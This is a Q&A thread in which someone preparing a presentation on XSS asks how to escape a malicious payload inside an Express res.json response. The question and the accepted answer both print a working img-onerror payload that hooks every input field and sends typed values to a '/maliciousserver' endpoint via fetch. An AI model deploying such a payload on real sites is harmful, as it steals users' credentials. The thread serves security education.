# res.json in Express with passing embedded JS

Tags: express, xss

I am working on a presentation I have to give on XSS attacks. In my presentation, my scenario is some bank employee somehow hijacks and adds a route handler to the banks express server so he or she can have the email and passwords punched in by bank customers sent to their own server.

The goal here is to show my audience that when I type an email and password, they should be able to see what I am typing inside of Chrome console, but I am getting syntax errors that is breaking the Express server.

I know that the first router that is supposed to have the good code, basically an ad from the bank works with `res.json({})` only like so:

```
app.get("/content/1/", (req, res) =>
  res.json({ content: "Thinking about taking out a new loan? Call us today." })
);
```

But it does not seem to work when embedding an HTML element with the malicious code and I am unclear whether this would work best with `res.sendFile()` or I just don't know where to put the  backslashes in the code to not break the server when adding it inside of `res.json({})`.

This is the code that is causing the Express server to crash, it is supposed to mimic what the bad guy did:

```
app.get("/content/2/", (req, res) => {
  res.json({ content: "<img src=\"\" onerror=\"document.querySelectorAll("input").forEach((el) => {
      el.addEventListener("input", (event) => {
        fetch(`/maliciousserver?value=${event.target.value}`);
      });
    });\" />"});
```

Comment: It would appear your not correctly escaping all your quotes.

Comment: @ste2425, I just added it above

Comment: To further my comment, surprised you haven't got a syntax error pointing to the quotes though.

Answer (score 0, accepted):

It's an escaping thing, the attacker would just rewrite the payload, so does not need work around the `"`'s

ie. `document.querySelectorAll('input').forEach(el => el.addEventListener('input', event => fetch('/maliciousserver?value='+event.target.value)))`

So passing back:

```
app.get("/content/2/", (req, res) => {
  res.json({ content: "<img src=\"\" onerror=\"document.querySelectorAll('input').forEach(el => el.addEventListener('input', event => fetch('/maliciousserver?value='+event.target.value)))\" />"});
```

You would then need unsafely place `content` on the dom, all things banks wouldn't do.

https://playcode.io/628761/

Comment: Ahh, I kept using double quotes around the value of the `res.json({})` as I confused it with pure json where you need double quotes on key/value. Thank you Lawrence. And yes to your point, the hypothetical is a disgruntled employee at the bank taking advantage of the fact the bank wanted to place an ad on the login page. As someone who has worked at banks, the placing of an ad on the login page is a very real scenario, marketing folks love doing that.